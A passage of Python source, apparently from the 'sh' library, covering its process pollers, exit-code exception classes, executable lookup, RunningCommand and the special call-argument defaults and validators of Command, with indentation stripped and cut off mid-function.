import warnings
import weakref
IS_PY3 = sys.version_info[0] == 3
MINOR_VER = sys.version_info[1]
IS_PY26 = sys.version_info[0] == 2 and MINOR_VER == 6
if IS_PY3:
from io import StringIO
ioStringIO = StringIO
from io import BytesIO as cStringIO
iocStringIO = cStringIO
from queue import Queue, Empty
# for some reason, python 3.1 removed the builtin "callable", wtf
if not hasattr(__builtins__, "callable"):
def callable(ob):
return hasattr(ob, "__call__")
else:
from StringIO import StringIO
from cStringIO import OutputType as cStringIO
from io import StringIO as ioStringIO
from io import BytesIO as iocStringIO
from Queue import Queue, Empty
try:
from shlex import quote as shlex_quote # here from 3.3 onward
except ImportError:
from pipes import quote as shlex_quote # undocumented before 2.7
if "windows" in platform.system().lower(): # pragma: no cover
raise ImportError("sh %s is currently only supported on linux and osx. \
please install pbs 0.110 (http://pypi.python.org/pypi/pbs) for windows \
support." % __version__)
DEFAULT_ENCODING = getpreferredencoding() or "UTF-8"
IS_MACOS = platform.system() in ("AIX", "Darwin")
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
SH_LOGGER_NAME = __name__
# normally i would hate this idea of using a global to signify whether we are
# running tests, because it breaks the assumption that what is running in the
# tests is what will run live, but we ONLY use this in a place that has no
# serious side-effects that could change anything. as long as we do that, it
# should be ok
RUNNING_TESTS = bool(int(os.environ.get("SH_TESTS_RUNNING", "0")))
FORCE_USE_SELECT = bool(int(os.environ.get("SH_TESTS_USE_SELECT", "0")))
# a re-entrant lock for pushd. this way, multiple threads that happen to use
# pushd will all see the current working directory for the duration of the
# with-context
PUSHD_LOCK = threading.RLock()
if hasattr(inspect, "getfullargspec"):
def get_num_args(fn):
return len(inspect.getfullargspec(fn).args)
else:
def get_num_args(fn):
return len(inspect.getargspec(fn).args)
if IS_PY3:
raw_input = input
unicode = str
basestring = str
long = int
_unicode_methods = set(dir(unicode()))
HAS_POLL = hasattr(select, "poll")
POLLER_EVENT_READ = 1
POLLER_EVENT_WRITE = 2
POLLER_EVENT_HUP = 4
POLLER_EVENT_ERROR = 8
# here we use an use a poller interface that transparently selects the most
# capable poller (out of either select.select or select.poll). this was added
# by zhangyafeikimi when he discovered that if the fds created internally by sh
# numbered > 1024, select.select failed (a limitation of select.select). this
# can happen if your script opens a lot of files
if HAS_POLL and not FORCE_USE_SELECT:
class Poller(object):
def __init__(self):
self._poll = select.poll()
# file descriptor <-> file object bidirectional maps
self.fd_lookup = {}
self.fo_lookup = {}
def __nonzero__(self):
return len(self.fd_lookup) != 0
def __len__(self):
return len(self.fd_lookup)
def _set_fileobject(self, f):
if hasattr(f, "fileno"):
fd = f.fileno()
self.fd_lookup[fd] = f
self.fo_lookup[f] = fd
else:
self.fd_lookup[f] = f
self.fo_lookup[f] = f
def _remove_fileobject(self, f):
if hasattr(f, "fileno"):
fd = f.fileno()
del self.fd_lookup[fd]
del self.fo_lookup[f]
else:
del self.fd_lookup[f]
del self.fo_lookup[f]
def _get_file_descriptor(self, f):
return self.fo_lookup.get(f)
def _get_file_object(self, fd):
return self.fd_lookup.get(fd)
def _register(self, f, events):
# f can be a file descriptor or file object
self._set_fileobject(f)
fd = self._get_file_descriptor(f)
self._poll.register(fd, events)
def register_read(self, f):
self._register(f, select.POLLIN | select.POLLPRI)
def register_write(self, f):
self._register(f, select.POLLOUT)
def register_error(self, f):
self._register(f, select.POLLERR | select.POLLHUP | select.POLLNVAL)
def unregister(self, f):
fd = self._get_file_descriptor(f)
self._poll.unregister(fd)
self._remove_fileobject(f)
def poll(self, timeout):
if timeout is not None:
# convert from seconds to milliseconds
timeout *= 1000
changes = self._poll.poll(timeout)
results = []
for fd, events in changes:
f = self._get_file_object(fd)
if events & (select.POLLIN | select.POLLPRI):
results.append((f, POLLER_EVENT_READ))
elif events & select.POLLOUT:
results.append((f, POLLER_EVENT_WRITE))
elif events & select.POLLHUP:
results.append((f, POLLER_EVENT_HUP))
elif events & (select.POLLERR | select.POLLNVAL):
results.append((f, POLLER_EVENT_ERROR))
return results
else:
class Poller(object):
def __init__(self):
self.rlist = []
self.wlist = []
self.xlist = []
def __nonzero__(self):
return len(self.rlist) + len(self.wlist) + len(self.xlist) != 0
def __len__(self):
return len(self.rlist) + len(self.wlist) + len(self.xlist)
@staticmethod
def _register(f, events):
if f not in events:
events.append(f)
@staticmethod
def _unregister(f, events):
if f in events:
events.remove(f)
def register_read(self, f):
self._register(f, self.rlist)
def register_write(self, f):
self._register(f, self.wlist)
def register_error(self, f):
self._register(f, self.xlist)
def unregister(self, f):
self._unregister(f, self.rlist)
self._unregister(f, self.wlist)
self._unregister(f, self.xlist)
def poll(self, timeout):
_in, _out, _err = select.select(self.rlist, self.wlist, self.xlist, timeout)
results = []
for f in _in:
results.append((f, POLLER_EVENT_READ))
for f in _out:
results.append((f, POLLER_EVENT_WRITE))
for f in _err:
results.append((f, POLLER_EVENT_ERROR))
return results
def encode_to_py3bytes_or_py2str(s):
""" takes anything and attempts to return a py2 string or py3 bytes. this
is typically used when creating command + arguments to be executed via
os.exec* """
fallback_encoding = "utf8"
if IS_PY3:
# if we're already bytes, do nothing
if isinstance(s, bytes):
pass
else:
s = str(s)
try:
s = bytes(s, DEFAULT_ENCODING)
except UnicodeEncodeError:
s = bytes(s, fallback_encoding)
else:
# attempt to convert the thing to unicode from the system's encoding
try:
s = unicode(s, DEFAULT_ENCODING)
# if the thing is already unicode, or it's a number, it can't be
# coerced to unicode with an encoding argument, but if we leave out
# the encoding argument, it will convert it to a string, then to unicode
except TypeError:
s = unicode(s)
# now that we have guaranteed unicode, encode to our system encoding,
# but attempt to fall back to something
try:
s = s.encode(DEFAULT_ENCODING)
except UnicodeEncodeError:
s = s.encode(fallback_encoding, "replace")
return s
def _indent_text(text, num=4):
lines = []
for line in text.split("\n"):
line = (" " * num) + line
lines.append(line)
return "\n".join(lines)
class ForkException(Exception):
def __init__(self, orig_exc):
tmpl = """
Original exception:
===================
%s
"""
msg = tmpl % _indent_text(orig_exc)
Exception.__init__(self, msg)
class ErrorReturnCodeMeta(type):
""" a metaclass which provides the ability for an ErrorReturnCode (or
derived) instance, imported from one sh module, to be considered the
subclass of ErrorReturnCode from another module. this is mostly necessary
in the tests, where we do assertRaises, but the ErrorReturnCode that the
program we're testing throws may not be the same class that we pass to
assertRaises
"""
def __subclasscheck__(self, o):
other_bases = set([b.__name__ for b in o.__bases__])
return self.__name__ in other_bases or o.__name__ == self.__name__
class ErrorReturnCode(Exception):
__metaclass__ = ErrorReturnCodeMeta
""" base class for all exceptions as a result of a command's exit status
being deemed an error. this base class is dynamically subclassed into
derived classes with the format: ErrorReturnCode_NNN where NNN is the exit
code number. the reason for this is it reduces boiler plate code when
testing error return codes:
try:
some_cmd()
except ErrorReturnCode_12:
print("couldn't do X")
vs:
try:
some_cmd()
except ErrorReturnCode as e:
if e.exit_code == 12:
print("couldn't do X")
it's not much of a savings, but i believe it makes the code easier to read """
truncate_cap = 750
def __reduce__(self):
return self.__class__, (self.full_cmd, self.stdout, self.stderr, self.truncate)
def __init__(self, full_cmd, stdout, stderr, truncate=True):
self.full_cmd = full_cmd
self.stdout = stdout
self.stderr = stderr
self.truncate = truncate
exc_stdout = self.stdout
if truncate:
exc_stdout = exc_stdout[:self.truncate_cap]
out_delta = len(self.stdout) - len(exc_stdout)
if out_delta:
exc_stdout += ("... (%d more, please see e.stdout)" % out_delta).encode()
exc_stderr = self.stderr
if truncate:
exc_stderr = exc_stderr[:self.truncate_cap]
err_delta = len(self.stderr) - len(exc_stderr)
if err_delta:
exc_stderr += ("... (%d more, please see e.stderr)" % err_delta).encode()
msg_tmpl = unicode("\n\n RAN: {cmd}\n\n STDOUT:\n{stdout}\n\n STDERR:\n{stderr}")
msg = msg_tmpl.format(
cmd=self.full_cmd,
stdout=exc_stdout.decode(DEFAULT_ENCODING, "replace"),
stderr=exc_stderr.decode(DEFAULT_ENCODING, "replace")
)
if not IS_PY3:
# Exception messages should be treated as an API which takes native str type on both
# Python2 and Python3. (Meaning, it's a byte string on Python2 and a text string on
# Python3)
msg = encode_to_py3bytes_or_py2str(msg)
super(ErrorReturnCode, self).__init__(msg)
class SignalException(ErrorReturnCode):
pass
class TimeoutException(Exception):
""" the exception thrown when a command is killed because a specified
timeout (via _timeout or .wait(timeout)) was hit """
def __init__(self, exit_code, full_cmd):
self.exit_code = exit_code
self.full_cmd = full_cmd
super(Exception, self).__init__()
SIGNALS_THAT_SHOULD_THROW_EXCEPTION = set((
signal.SIGABRT,
signal.SIGBUS,
signal.SIGFPE,
signal.SIGILL,
signal.SIGINT,
signal.SIGKILL,
signal.SIGPIPE,
signal.SIGQUIT,
signal.SIGSEGV,
signal.SIGTERM,
signal.SIGSYS,
))
# we subclass AttributeError because:
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
class CommandNotFound(AttributeError):
pass
rc_exc_regex = re.compile(r"(ErrorReturnCode|SignalException)_((\d+)|SIG[a-zA-Z]+)")
rc_exc_cache = {}
SIGNAL_MAPPING = dict([(v, k) for k, v in signal.__dict__.items() if re.match(r"SIG[a-zA-Z]+", k)])
def get_exc_from_name(name):
""" takes an exception name, like:
ErrorReturnCode_1
SignalException_9
SignalException_SIGHUP
and returns the corresponding exception. this is primarily used for
importing exceptions from sh into user code, for instance, to capture those
exceptions """
exc = None
try:
return rc_exc_cache[name]
except KeyError:
m = rc_exc_regex.match(name)
if m:
base = m.group(1)
rc_or_sig_name = m.group(2)
if base == "SignalException":
try:
rc = -int(rc_or_sig_name)
except ValueError:
rc = -getattr(signal, rc_or_sig_name)
else:
rc = int(rc_or_sig_name)
exc = get_rc_exc(rc)
return exc
def get_rc_exc(rc):
""" takes a exit code or negative signal number and produces an exception
that corresponds to that return code. positive return codes yield
ErrorReturnCode exception, negative return codes yield SignalException
we also cache the generated exception so that only one signal of that type
exists, preserving identity """
try:
return rc_exc_cache[rc]
except KeyError:
pass
if rc >= 0:
name = "ErrorReturnCode_%d" % rc
base = ErrorReturnCode
else:
signame = SIGNAL_MAPPING[abs(rc)]
name = "SignalException_" + signame
base = SignalException
exc = ErrorReturnCodeMeta(name, (base,), {"exit_code": rc})
rc_exc_cache[rc] = exc
return exc
# we monkey patch glob. i'm normally generally against monkey patching, but i
# decided to do this really un-intrusive patch because we need a way to detect
# if a list that we pass into an sh command was generated from glob. the reason
# being that glob returns an empty list if a pattern is not found, and so
# commands will treat the empty list as no arguments, which can be a problem,
# ie:
#
# ls(glob("*.ojfawe"))
#
# ^ will show the contents of your home directory, because it's essentially
# running ls([]) which, as a process, is just "ls".
#
# so we subclass list and monkey patch the glob function. nobody should be the
# wiser, but we'll have results that we can make some determinations on
_old_glob = glob_module.glob
class GlobResults(list):
def __init__(self, path, results):
self.path = path
list.__init__(self, results)
def glob(path, *args, **kwargs):
expanded = GlobResults(path, _old_glob(path, *args, **kwargs))
return expanded
glob_module.glob = glob
def canonicalize(path):
return os.path.abspath(os.path.expanduser(path))
def which(program, paths=None):
""" takes a program name or full path, plus an optional collection of search
paths, and returns the full path of the requested executable. if paths is
specified, it is the entire list of search paths, and the PATH env is not
used at all. otherwise, PATH env is used to look for the program """
def is_exe(file_path):
return (os.path.exists(file_path) and
os.access(file_path, os.X_OK) and
os.path.isfile(os.path.realpath(file_path)))
found_path = None
fpath, fname = os.path.split(program)
# if there's a path component, then we've specified a path to the program,
# and we should just test if that program is executable. if it is, return
if fpath:
program = canonicalize(program)
if is_exe(program):
found_path = program
# otherwise, we've just passed in the program name, and we need to search
# the paths to find where it actually lives
else:
paths_to_search = []
if isinstance(paths, (tuple, list)):
paths_to_search.extend(paths)
else:
env_paths = os.environ.get("PATH", "").split(os.pathsep)
paths_to_search.extend(env_paths)
for path in paths_to_search:
exe_file = os.path.join(canonicalize(path), program)
if is_exe(exe_file):
found_path = exe_file
break
return found_path
def resolve_command_path(program):
path = which(program)
if not path:
# our actual command might have a dash in it, but we can't call
# that from python (we have to use underscores), so we'll check
# if a dash version of our underscore command exists and use that
# if it does
if "_" in program:
path = which(program.replace("_", "-"))
if not path:
return None
return path
def resolve_command(name, baked_args=None):
path = resolve_command_path(name)
cmd = None
if path:
cmd = Command(path)
if baked_args:
cmd = cmd.bake(**baked_args)
return cmd
class Logger(object):
""" provides a memory-inexpensive logger. a gotcha about python's builtin
logger is that logger objects are never garbage collected. if you create a
thousand loggers with unique names, they'll sit there in memory until your
script is done. with sh, it's easy to create loggers with unique names if
we want our loggers to include our command arguments. for example, these
are all unique loggers:
ls -l
ls -l /tmp
ls /tmp
so instead of creating unique loggers, and without sacrificing logging
output, we use this class, which maintains as part of its state, the logging
"context", which will be the very unique name. this allows us to get a
logger with a very general name, eg: "command", and have a unique name
appended to it via the context, eg: "ls -l /tmp" """
def __init__(self, name, context=None):
self.name = name
self.log = logging.getLogger("%s.%s" % (SH_LOGGER_NAME, name))
self.context = self.sanitize_context(context)
def _format_msg(self, msg, *a):
if self.context:
msg = "%s: %s" % (self.context, msg)
return msg % a
@staticmethod
def sanitize_context(context):
if context:
context = context.replace("%", "%%")
return context or ""
def get_child(self, name, context):
new_name = self.name + "." + name
new_context = self.context + "." + context
return Logger(new_name, new_context)
def info(self, msg, *a):
self.log.info(self._format_msg(msg, *a))
def debug(self, msg, *a):
self.log.debug(self._format_msg(msg, *a))
def error(self, msg, *a):
self.log.error(self._format_msg(msg, *a))
def exception(self, msg, *a):
self.log.exception(self._format_msg(msg, *a))
def default_logger_str(cmd, call_args, pid=None):
if pid:
s = "<Command %r, pid %d>" % (cmd, pid)
else:
s = "<Command %r>" % cmd
return s
class RunningCommand(object):
""" this represents an executing Command object. it is returned as the
result of __call__() being executed on a Command instance. this creates a
reference to a OProc instance, which is a low-level wrapper around the
process that was exec'd
this is the class that gets manipulated the most by user code, and so it
implements various convenience methods and logical mechanisms for the
underlying process. for example, if a user tries to access a
backgrounded-process's stdout/err, the RunningCommand object is smart enough
to know to wait() on the process to finish first. and when the process
finishes, RunningCommand is smart enough to translate exit codes to
exceptions. """
# these are attributes that we allow to pass through to OProc
_OProc_attr_whitelist = set((
"signal",
"terminate",
"kill",
"kill_group",
"signal_group",
"pid",
"sid",
"pgid",
"ctty",
"input_thread_exc",
"output_thread_exc",
"bg_thread_exc",
))
def __init__(self, cmd, call_args, stdin, stdout, stderr):
"""
cmd is a list, where each element is encoded as bytes (PY3) or str (PY2)
"""
# self.ran is used for auditing what actually ran. for example, in
# exceptions, or if you just want to know what was ran after the
# command ran
#
# here we're making a consistent unicode string out if our cmd.
# we're also assuming (correctly, i think) that the command and its
# arguments are the encoding we pass into _encoding, which falls back to
# the system's encoding
enc = call_args["encoding"]
self.ran = " ".join([shlex_quote(arg.decode(enc, "ignore")) for arg in cmd])
self.call_args = call_args
self.cmd = cmd
self.process = None
self._waited_until_completion = False
should_wait = True
spawn_process = True
# this is used to track if we've already raised StopIteration, and if we
# have, raise it immediately again if the user tries to call next() on
# us. https://github.com/amoffat/sh/issues/273
self._stopped_iteration = False
# with contexts shouldn't run at all yet, they prepend
# to every command in the context
if call_args["with"]:
spawn_process = False
get_prepend_stack().append(self)
if call_args["piped"] or call_args["iter"] or call_args["iter_noblock"]:
should_wait = False
# we're running in the background, return self and let us lazily
# evaluate
if call_args["bg"]:
should_wait = False
# redirection
if call_args["err_to_out"]:
stderr = OProc.STDOUT
done_callback = call_args["done"]
if done_callback:
call_args["done"] = partial(done_callback, self)
# set up which stream should write to the pipe
# TODO, make pipe None by default and limit the size of the Queue
# in oproc.OProc
pipe = OProc.STDOUT
if call_args["iter"] == "out" or call_args["iter"] is True:
pipe = OProc.STDOUT
elif call_args["iter"] == "err":
pipe = OProc.STDERR
if call_args["iter_noblock"] == "out" or call_args["iter_noblock"] is True:
pipe = OProc.STDOUT
elif call_args["iter_noblock"] == "err":
pipe = OProc.STDERR
# there's currently only one case where we wouldn't spawn a child
# process, and that's if we're using a with-context with our command
self._spawned_and_waited = False
if spawn_process:
log_str_factory = call_args["log_msg"] or default_logger_str
logger_str = log_str_factory(self.ran, call_args)
self.log = Logger("command", logger_str)
self.log.debug("starting process")
if should_wait:
self._spawned_and_waited = True
# this lock is needed because of a race condition where a background
# thread, created in the OProc constructor, may try to access
# self.process, but it has not been assigned yet
process_assign_lock = threading.Lock()
with process_assign_lock:
self.process = OProc(self, self.log, cmd, stdin, stdout, stderr,
self.call_args, pipe, process_assign_lock)
logger_str = log_str_factory(self.ran, call_args, self.process.pid)
self.log.context = self.log.sanitize_context(logger_str)
self.log.info("process started")
if should_wait:
self.wait()
def wait(self, timeout=None):
""" waits for the running command to finish. this is called on all
running commands, eventually, except for ones that run in the background
if timeout is a number, it is the number of seconds to wait for the process to resolve. otherwise block on wait.
this function can raise a TimeoutException, either because of a `_timeout` on the command itself as it was
launched, or because of a timeout passed into this method.
"""
if not self._waited_until_completion:
# if we've been given a timeout, we need to poll is_alive()
if timeout is not None:
waited_for = 0
sleep_amt = 0.1
alive = False
exit_code = None
if timeout < 0:
raise RuntimeError("timeout cannot be negative")
# while we still have time to wait, run this loop
# notice that alive and exit_code are only defined in this loop, but the loop is also guaranteed to run,
# defining them, given the constraints that timeout is non-negative
while waited_for <= timeout:
alive, exit_code = self.process.is_alive()
# if we're alive, we need to wait some more, but let's sleep before we poll again
if alive:
time.sleep(sleep_amt)
waited_for += sleep_amt
# but if we're not alive, we're done waiting
else:
break
# if we've made it this far, and we're still alive, then it means we timed out waiting
if alive:
raise TimeoutException(None, self.ran)
# if we didn't time out, we fall through and let the rest of the code handle exit_code.
# notice that we set _waited_until_completion here, only if we didn't time out. this allows us to
# re-wait again on timeout, if we catch the TimeoutException in the parent frame
self._waited_until_completion = True
else:
exit_code = self.process.wait()
self._waited_until_completion = True
if self.process.timed_out:
# if we timed out, our exit code represents a signal, which is
# negative, so let's make it positive to store in our
# TimeoutException
raise TimeoutException(-exit_code, self.ran)
else:
self.handle_command_exit_code(exit_code)
# if an iterable command is using an instance of OProc for its stdin,
# wait on it. the process is probably set to "piped", which means it
# won't be waited on, which means exceptions won't propagate up to the
# main thread. this allows them to bubble up
if self.process._stdin_process:
self.process._stdin_process.command.wait()
self.log.debug("process completed")
return self
def is_alive(self):
""" returns whether or not we're still alive. this call has side-effects on OProc """
return self.process.is_alive()[0]
def handle_command_exit_code(self, code):
""" here we determine if we had an exception, or an error code that we
weren't expecting to see. if we did, we create and raise an exception
"""
ca = self.call_args
exc_class = get_exc_exit_code_would_raise(code, ca["ok_code"], ca["piped"])
if exc_class:
exc = exc_class(self.ran, self.process.stdout, self.process.stderr, ca["truncate_exc"])
raise exc
@property
def stdout(self):
self.wait()
return self.process.stdout
@property
def stderr(self):
self.wait()
return self.process.stderr
@property
def exit_code(self):
self.wait()
return self.process.exit_code
def __len__(self):
return len(str(self))
def __enter__(self):
""" we don't actually do anything here because anything that should have
been done would have been done in the Command.__call__ call.
essentially all that has to happen is the command be pushed on the
prepend stack. """
pass
def __iter__(self):
return self
def next(self):
""" allow us to iterate over the output of our command """
if self._stopped_iteration:
raise StopIteration()
# we do this because if get blocks, we can't catch a KeyboardInterrupt
# so the slight timeout allows for that.
while True:
try:
chunk = self.process._pipe_queue.get(True, self.call_args["iter_poll_time"])
except Empty:
if self.call_args["iter_noblock"]:
return errno.EWOULDBLOCK
else:
if chunk is None:
self.wait()
self._stopped_iteration = True
raise StopIteration()
try:
return chunk.decode(self.call_args["encoding"], self.call_args["decode_errors"])
except UnicodeDecodeError:
return chunk
# python 3
__next__ = next
def __exit__(self, exc_type, exc_val, exc_tb):
if self.call_args["with"] and get_prepend_stack():
get_prepend_stack().pop()
def __str__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
if IS_PY3:
return self.__unicode__()
else:
return unicode(self).encode(self.call_args["encoding"])
def __unicode__(self):
""" a magic method defined for python2. calling unicode() on a
RunningCommand object will call this """
if self.process and self.stdout:
return self.stdout.decode(self.call_args["encoding"], self.call_args["decode_errors"])
elif IS_PY3:
return ""
else:
return unicode("")
def __eq__(self, other):
return unicode(self) == unicode(other)
__hash__ = None # Avoid DeprecationWarning in Python < 3
def __contains__(self, item):
return item in str(self)
def __getattr__(self, p):
# let these three attributes pass through to the OProc object
if p in self._OProc_attr_whitelist:
if self.process:
return getattr(self.process, p)
else:
raise AttributeError
# see if strings have what we're looking for. we're looking at the
# method names explicitly because we don't want to evaluate self unless
# we absolutely have to, the reason being, in python2, hasattr swallows
# exceptions, and if we try to run hasattr on a command that failed and
# is being run with _iter=True, the command will be evaluated, throw an
# exception, but hasattr will discard it
if p in _unicode_methods:
return getattr(unicode(self), p)
raise AttributeError
def __repr__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
try:
return str(self)
except UnicodeDecodeError:
if self.process:
if self.stdout:
return repr(self.stdout)
return repr("")
def __long__(self):
return long(str(self).strip())
def __float__(self):
return float(str(self).strip())
def __int__(self):
return int(str(self).strip())
def output_redirect_is_filename(out):
return isinstance(out, basestring)
def get_prepend_stack():
tl = Command.thread_local
if not hasattr(tl, "_prepend_stack"):
tl._prepend_stack = []
return tl._prepend_stack
def special_kwarg_validator(passed_kwargs, merged_kwargs, invalid_list):
s1 = set(passed_kwargs.keys())
invalid_args = []
for elem in invalid_list:
if callable(elem):
fn = elem
ret = fn(passed_kwargs, merged_kwargs)
invalid_args.extend(ret)
else:
elem, error_msg = elem
if s1.issuperset(elem):
invalid_args.append((elem, error_msg))
return invalid_args
def get_fileno(ob):
# in py2, this will return None. in py3, it will return an method that
# raises when called
fileno_meth = getattr(ob, "fileno", None)
fileno = None
if fileno_meth:
# py3 StringIO objects will report a fileno, but calling it will raise
# an exception
try:
fileno = fileno_meth()
except UnsupportedOperation:
pass
elif isinstance(ob, (int, long)) and ob >= 0:
fileno = ob
return fileno
def ob_is_fd_based(ob):
return get_fileno(ob) is not None
def ob_is_tty(ob):
""" checks if an object (like a file-like object) is a tty. """
fileno = get_fileno(ob)
is_tty = False
if fileno is not None:
is_tty = os.isatty(fileno)
return is_tty
def ob_is_pipe(ob):
fileno = get_fileno(ob)
is_pipe = False
if fileno:
fd_stat = os.fstat(fileno)
is_pipe = stat.S_ISFIFO(fd_stat.st_mode)
return is_pipe
def tty_in_validator(passed_kwargs, merged_kwargs):
# here we'll validate that people aren't randomly shotgun-debugging different tty options and hoping that they'll
# work, without understanding what they do
pairs = (("tty_in", "in"), ("tty_out", "out"))
invalid = []
for tty_type, std in pairs:
if tty_type in passed_kwargs and ob_is_tty(passed_kwargs.get(std, None)):
error = "`_%s` is a TTY already, so so it doesn't make sense to set up a TTY with `_%s`" % (std, tty_type)
invalid.append(((tty_type, std), error))
# if unify_ttys is set, then both tty_in and tty_out must both be True
if merged_kwargs["unify_ttys"] and not (merged_kwargs["tty_in"] and merged_kwargs["tty_out"]):
invalid.append((
("unify_ttys", "tty_in", "tty_out"),
"`_tty_in` and `_tty_out` must both be True if `_unify_ttys` is True"
))
return invalid
def fg_validator(passed_kwargs, merged_kwargs):
""" fg is not valid with basically every other option """
invalid = []
msg = """\
_fg is invalid with nearly every other option, see warning and workaround here:
https://amoffat.github.io/sh/sections/special_arguments.html#fg"""
whitelist = set(("env", "fg", "cwd"))
offending = set(passed_kwargs.keys()) - whitelist
if "fg" in passed_kwargs and passed_kwargs["fg"] and offending:
invalid.append(("fg", msg))
return invalid
def bufsize_validator(passed_kwargs, merged_kwargs):
""" a validator to prevent a user from saying that they want custom
buffering when they're using an in/out object that will be os.dup'ed to the
process, and has its own buffering. an example is a pipe or a tty. it
doesn't make sense to tell them to have a custom buffering, since the os
controls this. """
invalid = []
in_ob = passed_kwargs.get("in", None)
out_ob = passed_kwargs.get("out", None)
in_buf = passed_kwargs.get("in_bufsize", None)
out_buf = passed_kwargs.get("out_bufsize", None)
in_no_buf = ob_is_fd_based(in_ob)
out_no_buf = ob_is_fd_based(out_ob)
err = "Can't specify an {target} bufsize if the {target} target is a pipe or TTY"
if in_no_buf and in_buf is not None:
invalid.append((("in", "in_bufsize"), err.format(target="in")))
if out_no_buf and out_buf is not None:
invalid.append((("out", "out_bufsize"), err.format(target="out")))
return invalid
def env_validator(passed_kwargs, merged_kwargs):
""" a validator to check that env is a dictionary and that all environment variable
keys and values are strings. Otherwise, we would exit with a confusing exit code 255. """
invalid = []
env = passed_kwargs.get("env", None)
if env is None:
return invalid
if not isinstance(env, Mapping):
invalid.append(("env", "env must be dict-like. Got {!r}".format(env)))
return invalid
for k, v in passed_kwargs["env"].items():
if not isinstance(k, str):
invalid.append(("env", "env key {!r} must be a str".format(k)))
if not isinstance(v, str):
invalid.append(("env", "value {!r} of env key {!r} must be a str".format(v, k)))
return invalid
class Command(object):
""" represents an un-run system program, like "ls" or "cd". because it
represents the program itself (and not a running instance of it), it should
hold very little state. in fact, the only state it does hold is baked
arguments.
when a Command object is called, the result that is returned is a
RunningCommand object, which represents the Command put into an execution
state. """
thread_local = threading.local()
_call_args = {
"fg": False, # run command in foreground
# run a command in the background. commands run in the background
# ignore SIGHUP and do not automatically exit when the parent process
# ends
"bg": False,
# automatically report exceptions for background commands
"bg_exc": True,
"with": False, # prepend the command to every command after it
"in": None,
"out": None, # redirect STDOUT
"err": None, # redirect STDERR
"err_to_out": None, # redirect STDERR to STDOUT
# stdin buffer size
# 1 for line, 0 for unbuffered, any other number for that amount
"in_bufsize": 0,
# stdout buffer size, same values as above
"out_bufsize": 1,
"err_bufsize": 1,
# this is how big the output buffers will be for stdout and stderr.
# this is essentially how much output they will store from the process.
# we use a deque, so if it overflows past this amount, the first items
# get pushed off as each new item gets added.
#
# NOTICE
# this is not a *BYTE* size, this is a *CHUNK* size...meaning, that if
# you're buffering out/err at 1024 bytes, the internal buffer size will
# be "internal_bufsize" CHUNKS of 1024 bytes
"internal_bufsize": 3 * 1024 ** 2,
"env": None,
"piped": None,
"iter": None,
"iter_noblock": None,
# the amount of time to sleep between polling for the iter output queue
"iter_poll_time": 0.1,
"ok_code": 0,
"cwd": None,
# the separator delimiting between a long-argument's name and its value
# setting this to None will cause name and value to be two separate
# arguments, like for short options
# for example, --arg=derp, '=' is the long_sep
"long_sep": "=",
# the prefix used for long arguments
"long_prefix": "--",
# this is for programs that expect their input to be from a terminal.
# ssh is one of those programs
"tty_in": False,
"tty_out": True,
"unify_ttys": False,
"encoding": DEFAULT_ENCODING,
"decode_errors": "strict",
# how long the process should run before it is auto-killed
"timeout": None,
"timeout_signal": signal.SIGKILL,
# TODO write some docs on "long-running processes"
# these control whether or not stdout/err will get aggregated together
# as the process runs. this has memory usage implications, so sometimes
# with long-running processes with a lot of data, it makes sense to
# set these to true
"no_out": False,
"no_err": False,
"no_pipe": False,
# if any redirection is used for stdout or stderr, internal buffering
# of that data is not stored. this forces it to be stored, as if
# the output is being T'd to both the redirected destination and our
# internal buffers
"tee": None,
# will be called when a process terminates regardless of exception
"done": None,
# a tuple (rows, columns) of the desired size of both the stdout and
# stdin ttys, if ttys are being used
"tty_size": (20, 80),
# whether or not our exceptions should be truncated
"truncate_exc": True,
# a function to call after the child forks but before the process execs
"preexec_fn": None,
# UID to set after forking. Requires root privileges. Not supported on
# Windows.
"uid": None,
# put the forked process in its own process session?
"new_session": True,
# pre-process args passed into __call__. only really useful when used
# in .bake()
"arg_preprocess": None,
# a callable that produces a log message from an argument tuple of the
# command and the args
"log_msg": None,
# whether or not to close all inherited fds. typically, this should be True, as inheriting fds can be a security
# vulnerability
"close_fds": True,
# a whitelist of the integer fds to pass through to the child process. setting this forces close_fds to be True
"pass_fds": set(),
}
# this is a collection of validators to make sure the special kwargs make
# sense
_kwarg_validators = (
(("err", "err_to_out"), "Stderr is already being redirected"),
(("piped", "iter"), "You cannot iterate when this command is being piped"),
(("piped", "no_pipe"), "Using a pipe doesn't make sense if you've disabled the pipe"),
(("no_out", "iter"), "You cannot iterate over output if there is no output"),
(("close_fds", "pass_fds"), "Passing `pass_fds` forces `close_fds` to be True"),
tty_in_validator,
bufsize_validator,
env_validator,
fg_validator,
)
def __init__(self, path, search_paths=None):
found = which(path, search_paths)
self._path = encode_to_py3bytes_or_py2str("")
# is the command baked (aka, partially applied)?
self._partial = False
self._partial_baked_args = []
self._partial_call_args = {}
# bugfix for functools.wraps. issue #121
self.__name__ = str(self)
if not found:
raise CommandNotFound(path)
# the reason why we set the values early in the constructor, and again
# here, is for people who have tools that inspect the stack on
# exception. if CommandNotFound is raised, we need self._path and the
# other attributes to be set correctly, so repr() works when they're
# inspecting the stack. issue #304
self._path = encode_to_py3bytes_or_py2str(found)
self.__name__ = str(self)
def __getattribute__(self, name):
# convenience
get_attr = partial(object.__getattribute__, self)
val = None
if name.startswith("_"):
val = get_attr(name)
elif name == "bake":
val = get_attr("bake")
# here we have a way of getting past shadowed subcommands. for example,
# if "git bake" was a thing, we wouldn't be able to do `git.bake()`
# because `.bake()` is already a method. so we allow `git.bake_()`
elif name.endswith("_"):
name = name[:-1]
if val is None:
val = get_attr("bake")(name)
return val
@staticmethod
def _extract_call_args(kwargs):
""" takes kwargs that were passed to a command's __call__ and extracts
out the special keyword arguments, we return a tuple of special keyword
args, and kwargs that will go to the exec'ed command """
kwargs = kwargs.copy()
call_args = {}
for parg, default in Command._call_args.items():
key = "_" + parg
if key in kwargs:
call_args[parg] = kwargs[key]
del kwargs[key]
merged_args = Command._call_args.copy()
merged_args.update(call_args)
invalid_kwargs = special_kwarg_validator(call_args, merged_args, Command._kwarg_validators)
if invalid_kwargs:
exc_msg = []
for kwarg, error_msg in invalid_kwargs:
exc_msg.append(" %r: %s" % (kwarg, error_msg))
exc_msg = "\n".join(exc_msg)
raise TypeError("Invalid special arguments:\n\n%s\n" % exc_msg)
return call_args, kwargs
# TODO needs documentation
def bake(self, *args, **kwargs):
fn = type(self)(self._path)
